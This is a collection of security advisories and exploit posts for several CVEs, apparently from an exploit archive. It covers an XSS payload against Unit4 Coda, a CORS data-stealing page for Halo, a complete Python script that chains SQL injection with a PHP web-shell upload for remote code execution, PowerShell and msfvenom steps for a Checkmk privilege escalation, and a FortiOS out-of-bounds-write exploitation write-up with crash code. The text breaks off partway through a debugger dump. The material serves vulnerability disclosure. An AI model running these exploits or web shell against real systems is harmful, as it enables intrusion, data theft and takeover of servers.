<pre><code># Vulnerability type: Cross-site Scripting<br /># Vendor: https://www.unit4.com/<br /># Product: Financials by Coda<br /># Product site: https://www.unit4.com/fr/products/financial-management-software<br /># Affected version: < 2023Q4<br /># Fixed version: 2023Q4<br /># Credit: Léo DRAGHI<br /># CVE: CVE-2024-28734<br /><br /># PROOF OF CONCEPT<br />The /coda/frameset endpoint, accessible by any unauthenticated user, reflects the value of the cols parameter. <br />Since this value is not properly sanitized and encoded when the web page is rendered, this could allow a malicious actor to execute JavaScript code in the context of another user's browser by only sending to a victim a malicious link.<br /><br />GET /coda/frameset?cols="><frame%20src="javascript:alert('XSS')"> HTTP/2<br />Host: <target><br /><br /># TIMELINE<br />– 30/10/2023: Vulnerability found<br />– 02/11/2023: Vendor informed<br />– 05/12/2023: Vendor fixed the issue<br />– 14/03/2024: Public disclosure<br /></code></pre>
<pre><code>## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted<br />## Author: nu11secur1ty<br />## Date: 03/15/2024<br />## Vendor: https://www.halo.run/<br />## Software: https://github.com/halo-dev/halo<br />## Reference: https://portswigger.net/web-security/cors<br /><br />## Description:<br />The application implements an HTML5 cross-origin resource sharing<br />(CORS) policy for this request that allows access from any domain.<br />The application allowed access from the requested origin null<br />The application allows two-way interaction from the null origin. This<br />effectively means that any domain can perform two-way interaction by<br />causing the browser to submit the null origin, for example by issuing<br />the request from a sandboxed iframe or malicious fishing domain with a<br />specially crafted HTML exploit.<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Exploit:<br />```HTML<br /><html><br /><body><br /><center><br /><h2>CORS POC Exploit<br /><h3>Extract SID<br /><br /><div id="demo"><br /><button type="button" onclick="cors()">Exploit Click here<br /></div><br /><br /><script><br />function cors() {<br />var xhttp = new XMLHttpRequest();<br />xhttp.onreadystatechange = function() {<br />if (this.readyState == 4 && this.status == 200) {<br />document.getElementById("demo").innerHTML = alert(this.responseText);<br />}<br />};<br />xhttp.open("GET",<br />"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",<br />true);<br />xhttp.withCredentials = true;<br />xhttp.send();<br />}<br /></script><br /><br /></body><br /></html><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)<br /><br />## Time spent:<br />00:25:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>from requests_toolbelt.multipart.encoder import MultipartEncoder<br />import requests<br />import string<br />import random<br />import os<br /><br /><br /># ========================================================================================================<br /><br /># Application: Membership Management System<br /># Bugs: SQL injection + Insecure File Upload = Remote Code Execution<br /># Date: 14.03.2024<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://codeastro.com/author/nbadmin/<br /># Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/<br /># Version: 1.0<br /># --------------------------------------------------<br /><br /># Vulnerability Description:<br /><br /># The sql injection vulnerability was found in the file `Membership-PHP/index.php`<br /><br /># The login page located at MembershipM-PHP/index.php contains a SQL Injection vulnerability. <br /># This vulnerability allows attackers to inject malicious SQL code into the input fields used to provide login credentials. <br /># Through this exploit, unauthorized users can gain access to sensitive data or even take control of the system.<br /><br /><br /># Vulnerable Code Section:<br /><br /># $email = $_POST['email'];<br /># $password = $_POST['password'];<br /># $hashed_password = md5($password);<br /># $sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";<br /><br /><br /># The Insecure File Upload vulnerability appeared in this file `MembershipM-PHP/settings.php` <br /><br /># The MembershipM-PHP/settings.php file contains an insecure file upload vulnerability. <br /># This allows attackers to upload unauthorized files to the server and potentially execute remote code execution (RCE) attacks.<br /><br /><br /># Vulnerable Code Section:<br /><br /># if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {<br /># $logoName = $_FILES['logo']['name'];<br /># $logoTmpName = $_FILES['logo']['tmp_name'];<br /># $logoType = $_FILES['logo']['type'];<br /># $uploadPath = 'uploads/';<br /><br /># $targetPath = $uploadPath . $logoName;<br /># if (move_uploaded_file($logoTmpName, $targetPath)) {<br /><br /># $updateSettingsQuery = "UPDATE settings SET system_name = '$systemName', logo = '$targetPath', currency = '$currency' WHERE id = 1";<br /># $updateSettingsResult = $conn->query($updateSettingsQuery);<br /><br /># if ($updateSettingsResult) {<br /># $successMessage = 'System settings updated successfully.';} else {<br /># $errorMessage = 'Error updating system settings: ' . $conn->error;}} else {<br /># $errorMessage = 'Error moving uploaded file.';}}<br /> <br /><br /><br /># --------------------------------------------------<br /><br /># reference : https://sospiro014.github.io/Membership-Management-System-RCE<br /># I created the python code used in the exploit by looking at this https://www.exploit-db.com/exploits/50123 source and modifying it<br /><br /><br /># ========================================================================================================<br /><br /><br /># generate random string 8 chars<br />def randomGen(size=8, chars=string.ascii_lowercase):<br /> return ''.join(random.choice(chars) for _ in range(size))<br /><br /># generating a random username and a random web shell file<br />shellFile = randomGen() + ".php"<br /><br /># creating a payload for the login<br />payload = {<br /> "email": "test@mail.com' or 0=0 #",<br /> "password": "a",<br /> "login": ""<br />}<br /><br />session = requests.Session()<br /><br /># changeme<br />urlBase = "http://172.17.86.197/" # change this target ip :)<br /><br /># login<br />url = urlBase + "index.php"<br />print("=== executing SQL Injection ===")<br />req = session.post(url, payload, allow_redirects=False)<br /><br /># check if 'Set-Cookie' header is present in the response<br />if 'Set-Cookie' in req.headers:<br /> cookie = req.headers["Set-Cookie"]<br /> print("=== authenticated admin cookie:" + cookie + " ===")<br />else:<br /> print("Set-Cookie header not found in the response.")<br /> exit()<br /><br /># upload shell<br />url = urlBase + "settings.php"<br /><br /># Get user input for the command to execute<br />cmd_input = input("Enter the command to execute: ")<br /><br /># PHP code to execute the command received from the user<br />php_code = "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>"<br /><br />mp_encoder = MultipartEncoder(<br /> fields={<br /> "systemName": "Membership System",<br /> "currency": "$",<br /> "logo": (shellFile, php_code, "application/x-php"),<br /> "updateSettings": ""<br /> }<br />)<br /><br />headers = {<br /> "Cookie": cookie,<br /> 'Content-Type': mp_encoder.content_type<br />}<br /><br />print("=== login user and uploading shell " + shellFile + " ===")<br />req = session.post(url, data=mp_encoder, allow_redirects=False, headers=headers)<br /><br /># curl the shell for test<br />requestUrl = "curl " + urlBase + "uploads/" + shellFile + "?cmd=" + cmd_input<br />print("=== issuing the command: " + requestUrl + " ===")<br /><br />print("=== CURL OUTPUT ===")<br />os.system(requestUrl)<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240307-0 ><br />=======================================================================<br /> title: Local Privilege Escalation via writable files<br /> product: Checkmk Agent<br /> vulnerable version: 2.0.0, 2.1.0, 2.2.0<br /> fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1<br /> CVE number: CVE-2024-0670<br /> impact: high<br /> homepage: https://checkmk.com<br /> found: 2023-12-01<br /> by: Michael Baer (Office Fürth)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT<br />infrastructure with new features for monitoring native cloud applications,<br />OpenShift support, an expanded REST API, UX improvements, enhanced<br />integrations and over 174 new or reworked checks and agents. Monitor your<br />cloud assets from top hyperscalers with Checkmk 2.2 in addition to the<br />powerful monitoring of your on-premises networks and servers."<br /><br />Source: https://checkmk.com/product/latest-version<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local Privilege Escalation via writable files (CVE-2024-0670)<br />In some cases, the software creates temporary files inside the directory<br />C:\Windows\Temp that get executed afterwards. An attacker can leverage this<br />to place write-protected malicious files in the directory beforehand. The files<br />get executed by Checkmk with SYSTEM privileges allowing attackers to escalate<br />their privileges.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local Privilege Escalation via writable files (CVE-2024-0670)<br />In the first step, the filename that will be used by Checkmk needs to be found.<br />The application creates temporary files with name cmk_{}_{}_{}.cmd. The<br />placeholders are replaced with a string, the process id and a counter. The first<br />string was always 'all' and the counter usually is 0. The process id is not<br />exactly predictable. However, Windows assigns those numbers in increasing order.<br />This allows to observe the currently used process ids and define a limited<br />range of probable ids.<br /><br />In the second step, the attacker places the malicious binary into the folder<br />C:\Windows\Temp multiple times. The filenames are constructed using the above<br />pattern for all different probable ids. After placing the files, the attacker<br />marks them as read-only. Both can be automated using the following powershell<br />command. Here, the range of probable ids was determined to be between 10000<br />and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file.<br /><br />10000..30000 | foreach {<br /> copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;<br /> Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;<br />}<br /><br />For this proof of concept, a binary was created using msfvenom that executes<br />the command whoami and writes the result to a file. This will allow to verify<br />the successful execution as the SYSTEM user. The following command was used:<br /><br />msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe<br /><br />It should be noted, that the folder C:\abc has to exist and that the anti-virus<br />solution must be disabled to execute this particular binary.<br /><br />The final step is to force Checkmk to write and execute those temporary files.<br /><br />It was observed that repairing the software is enough. This repair process can<br />be initiated via the Windows GUI or using the following command. The name<br />fafda3e.msi will be different on every system. The folder C:\Windows\Installer<br />can be investigated to find the correct name on a given system.<br /><br />msiexec /fa C:\Windows\Installer\fafda3e.msi<br /><br />After the repairing finished, the file written by the malicious binary can be<br />checked. It was created and contains the string "nt authority\system".<br />[see figure checkmk_tempfolder.png]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* 2.1.0<br /><br />According to the vendor, the following versions are affected:<br />* 2.0.0<br />* 2.1.0<br />* 2.2.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-15: Contacting vendor through security@checkmk.com<br />2024-01-18: Vendor confirms vulnerability, assigns CVE, and<br /> prepares a fix<br />2024-01-26: Providing credits and acknowledging CVSS score.<br />2024-03-04: Vendor informs us that fixes with Werk #16361<br /> are available.<br />2024-03-07: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's<br />download page:<br /><br />https://checkmk.com/download<br /><br />More information can be found within the vendor's security advisory:<br />https://checkmk.com/werk/16361<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Michael Baer / @2024<br /></code></pre>
<pre><code>CVE ID: CVE-2024-25228<br /><br />Title: Authenticated Command Injection Vulnerability in ManoeuvreHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability has been discovered in the `getVerifydiyResult` function within the `ManoeuvreHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, intended for validating IP addresses or web resources, is vulnerable to authenticated command injection due to insufficient input validation and sanitization.<br /><br />Function Analysis:<br />- The function accepts an input array `$params`, focusing on the `type` and `value` keys.<br />- Based on the `type`, it attempts to validate the input using either `verifyPing` (for IP addresses) or `verifyWeb` (for web resources).<br />- The vulnerability specifically lies in the `verifyPing` method, where the `exec` function is used to execute a `ping` command with the user-supplied `value`, without proper validation or sanitization.<br /><br />Exploitation Risk:<br />Authenticated attackers can exploit this vulnerability by injecting malicious commands into the `value` parameter. When processed by the vulnerable function, these commands can be executed on the server, leading to unauthorized access or control.<br /><br />Current Status:<br />As of the latest available information, no patch has been released for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery. The vendor has not acknowledged the vulnerability.<br /><br />Recommendation:<br />Users are advised to apply strict access controls to mitigate the risk posed by this vulnerability until an official patch is released. Monitoring for any updates from Vinchin regarding this issue is also recommended.<br /><br />Discoverer: Valentin Lobstein<br /><br /></code></pre>
<pre><code># CVE-2024-21762<br />out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability <br /><br />Vulnerability<br />=====<br /><br />FortiGate released a version update in February, fixing multiple medium- and high-risk vulnerabilities. One of the severe-level vulnerabilities is an unauthorized out-of-bounds write vulnerability in SSL VPN. The vulnerability warning states that this vulnerability may be exploited in the wild. This article will introduce the author's analysis of the process of exploiting this vulnerability to achieve remote code execution.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/7f0e0f05-9d1b-4e4e-b877-646dc585f07a)<br /><br /><br />The environment used for vulnerability analysis in this article is `FGT_VM64-v7.4.2.F-build2571` <br /><br />diff <br />======<br /><br />Comparing the binaries of the repaired versions (7.4.2 and 7.4.3), the analysis found that the repair code is located in function `sub_18F4980`(7.4.2).<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a07f1ef5-5fc6-451b-9613-d1adbeb1e734)<br /><br />Analyzing this function, it is not difficult to find that the logic of this function is to read the body data of the HTTP POST request. At the same time, Transfer-Encodingit is determined according to the request header whether to read in chunk format or based on Content-Lengthreading. According to the control flow graph comparison results, there are two code modifications:<br /><br />When parsing the chunk format, call ap_getlinethe read chunk length and check ap_getlinewhether the return value is greater than 16. If it is greater than 16, it is considered an illegal chunk length.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/079c74e6-1302-42ce-bb83-519e11d9505b)<br /><br />When reading the chunk trailer, the source of the written \r\noffset is `line_offthe` assignment source, `line_offthe` value before repair is from , and the return value after `*(_QWORD *)(a1 + 744)` repair is . `line_offap_getline`<br /><br />Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a11a4bea-7e45-4ec7-b63c-34f8dd0337c0)<br /><br />Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/63f92eaf-68f6-4d32-935b-0451e5da07dc)<br /><br />At the same time, reading the code can tell that when the value of the chunk length field is 0 after hex decoding, it will enter the logic of chunk trailer reading.<br /><br />Triggering out-of-bounds <br />=========<br /><br />After analyzing the patch, we can draw the following conclusions:<br /><br />1. When parsing a chunk, if the hex decoded value of the chunk length field is 0, start reading the chunk trailer.<br />2. After calling ap_getline to read the chunk trailer, it will be written to the buffer according to the length of the chunk length field `\r\n`.<br />3. <br />Therefore, if many 0s are passed in the chunk length field, and the length of 0s is greater than 1/2 of the remaining buffer length, an out-of-bounds write will be triggered \r\n. Through debugging, we can know that the target buffer is located on the stack `(function sub_1A111E0)` , and the return address is stored at offset 0x2028. If written at offset 0x202e `\r\n`, reta crash will occur due to an illegal address when the function returns to execute the instruction to resume rip.<br /><br />Crash PoC:<br /><br />```http<br />pkt = b"""\<br />GET / HTTP/1.1<br />Host: %s<br />Transfer-Encoding: chunked<br /><br />%s\r\n%s\r\n\r\n""" % (hostname.encode(), b"0"*((0x202e//2)-2), b"a")<br /><br />ssock = create_ssock(hostname, port)<br />ssock.send(pkt)<br />ssock.recv(4096)<br />```<br /><br />Crash scene:<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b948f525-bee9-4344-85c1-b1fce8d65acb)<br /><br /><br />By analyzing the cause of the vulnerability, it can be seen that the vulnerability can be used to write `\r\n` two bytes out of bounds on the stack, and the out-of-bounds range is close to `0x2000`. Since the written content is very limited, RCE cannot be achieved by directly hijacking rip. Therefore, you need to focus on the memory pointer saved on the stack.<br /><br /><br />failed attempt<br />============<br /><br />What is easier to think of is to hijack rbp and overwrite the low byte of rbp so that rbp just points to a controllable memory area. When the upper-level function returns to execute the instruction, rip can be completely hijacked. However, during verification, it was found that even if rbp on the stack is overwritten, rsp and rip cannot be hijacked, and the program will not even crash. Continuing to trace back up, we find the parent function . This function is not called to restore rsp when it returns , but directly , so it cannot achieve the expected effect. leave retsub_1A111E0sub_1A26040 leave retadd rsp, 0x18<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9097dd29-45a8-41c7-99be-eddd88308cce)<br /><br />Find another breakthrough point<br />======<br /><br />As seen in the previous section, the function saves the values ​​of the five registers `rbx` and r12-r15 on the stack, and restores these registers when the function returns. Continue backtracking to find the parent function . You can see that what is saved in r13 is exactly the parameters `sub_1A26040sub_1A27650a1` .<br /><br /><br />a1 is a structure pointer. Through debugging, we can also see that a heap address is saved on the stack r13<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/8d419563-39f1-47b0-93b5-8f438cdecbf7)<br /><br /><br />If the memory in the red area in the figure is overwritten by out-of-bounds writing, then the r13 register is restored when the function returns, and the value of the pointer can be tampered with . If the heap memory can be laid out so that a1 points to a memory area arranged in advance, then the entire a1 structure can be hijacked. At the same time, through analysis of the code logic of and , there are a large number of dynamic function calls of a1 multi-level structure members, so there will be more opportunities to hijack **a1.sub_1A26040a1sub_1A27650sub_1A26040**<br /><br />Hijacking a structure<br />==============<br /><br />According to the assumption, after the low byte of the a1 pointer is overwritten , it can point to the pre-arranged memory. as the picture shows: `\r\n`<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/16ecb081-617e-42a6-b0d7-f009d0a235a3)<br /><br />In order to achieve this effect, the following conditions need to be met:<br /><br />The `a1` structure address is higher than the heap spray area address, and the gap between them is very small.<br />`0x7fxxxxxxx0a0d` Must point to the forged structure.<br /><br />Debugging can find that the size of the a1 structure is `0x730` . According to the alignment rules of jemalloc, a heap block of size `0x800` will be allocated. The 0x800 heap block is not commonly used during request processing, so it is easy to exhaust the `0x800` heap block in tcache, and at the same time apply for more new 0x800 blocks, so that they can enter tcache after release. Heap injection also selects heap blocks of uncommon sizes so that the newly applied heap blocks are continuous and close to the newly applied 0x800; heap injection chooses to use larger heap blocks to ensure that their addresses are aligned with 0x800, so that It is easy to ensure that the lower 12 bits of each forged structure address are 0xa0d; the heap spray range is not less than `0x10000` to ensure that it points to the heap spray area. The effect after hijacking is as follows: `0x7fxxxxxxx0a0d`<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/4553bf2f-7590-4dcd-bd94-972465e7be5f)<br /><br />Find exploitable multi-level pointers<br />======================<br /><br />Through the above operations, the hijacking of the a1 structure can be achieved. Combing through the code of function sum, there are many dynamic calls to the second-level pointer and third-level pointer of the a1 structure member, for example: `sub_1A27650sub_1A26040`<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f9f65242-90dd-43ee-8fdb-95fa9059805e)<br /><br />When `(0<N<5)` is satisfied , it will be called dynamically . Therefore, the member needs to be faked into a multi-level pointer, which ultimately points to the function we want to call. Since the target binary does not have PIE protection turned on, you can find qualified multi-level pointers in the target binary. Analyzing the binary, we can find that the first points to the GOT table address of the corresponding function.`*(_BYTE *)(a1+0x20*(N+6)+0x10)&6==0*(__int64 (__fastcall **)(__int64))(*(_QWORD *)(*(_QWORD *)(a1 + 0x298)+0x70)+0xC0)(a1)a1 + 0x298` <br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9d274361-093b-4042-9c67-bd5083c8d888)<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f27436b9-a3d1-4650-85d6-6117b57ad3a3)<br /><br />Therefore, taking functions as an example, you can find qualified multi-level pointers **system**<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/3ca3f7d6-b416-4cf8-9c41-6f6eb1e79b0e)<br /><br />During heap spraying, changing the value at offset 0x298 of the structure can be used to call the system function. The effect is as follows: `0x4368d0`<br /><br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/c19cfc84-c3c3-43a5-909b-5d5eee935815)<br /><br />As shown in the figure, the parameter of the dynamic call is exactly a1, and the memory pointed to is controllable. At this point, you can normally use the system function to execute any command. However, in FortiGate, the file does not have the ability to execute commands, so using the system function to execute commands cannot be executed successfully. `/bin/sh`<br /><br /><br />Hijack RIP<br />============<br /><br />Since the system function cannot execute commands, we can only find other ways to complete RCE. The existing condition is that any GOT table function can be called, and the memory pointed to by the first parameter of the function is controllable. Therefore, if there is a function in the GOT table that will call back a certain member of the parameter, there is a chance to achieve RIP hijacking. It’s easy to think of functions that were often used in previous FortiGate exploits . **SSL_do_handshake**<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/bc6aaf2a-9c58-4ade-9af0-ccadcc79274b)<br /><br />You only need to construct the SSL structure so that the conditions are met and the final call is made to realize rip hijacking and hijack rip to 0xdeadbeef as shown in the `figure:s->handshake_func(s)`<br /><br />![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b3979820-893f-47e3-bd94-b63fa58a7bb7)<br /><br /><br />The FortiGate main program is an All-in-One binary with a size of over 70MB. There are a large number of gadgets that can be used. It is not difficult to implement RCE using ROP, so I won’t go into details.<br /><br /><br />### demo :<br /><br />Although web mode is turned off by default in SSL VPN version 7.4.2 and browser access returns 403, this vulnerability can still be exploited in the default configuration.<br /><br />![ezgif-6-c1d88c0511](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/0e8188fa-de85-4579-b932-924c0e54b334)<br /><br /><br /><br />This vulnerability is similar to the heap overflow vulnerability caused by XOR last year . They are both seemingly useless overflow vulnerabilities. The exploitation process is more tricky and more like a CTF question. However, compared with traditional CTF problems that attack heap managers, real vulnerabilities require more context structures and code logic to be exploited. The author's level is limited. If there are any mistakes, please correct me.CVE-2023-27997<br /><br /><br />original post In Chinese : https://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU#rd<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Emegrab.b<br />Vulnerability: Remote Stack Buffer Overflow (SEH)<br />Family: Emegrab<br />Type: PE32<br />MD5: 19a14d0414aec62ef38378de2e8b259d<br />Vuln ID: MVID-2024-0675<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 03/13/2024<br />Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).<br /><br /><br />Memory Dump:<br />(14c0.b6c): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000<br />eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:009> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000<br />eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:009> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br />*** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - <br /><br />FAULTING_IP: <br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<br /><br />EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8)<br />ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 26100000<br />Attempt to write to address 26100000<br /><br />PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+fa2b<br />41414141 ?? ???<br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 41414141<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 260f5e38 -- (.cxr 0x260f5e38)<br />eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74<br />eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:<br />0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=??<br />Resetting default scope<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b<br />260fff88 41414141 unknown!printable+0x0<br />260fff8c 41414141 unknown!printable+0x0<br />260fff90 41414141 unknown!printable+0x0<br />260fff94 41414141 unknown!printable+0x0<br />260fff98 41414141 unknown!printable+0x0<br />260fff9c 41414141 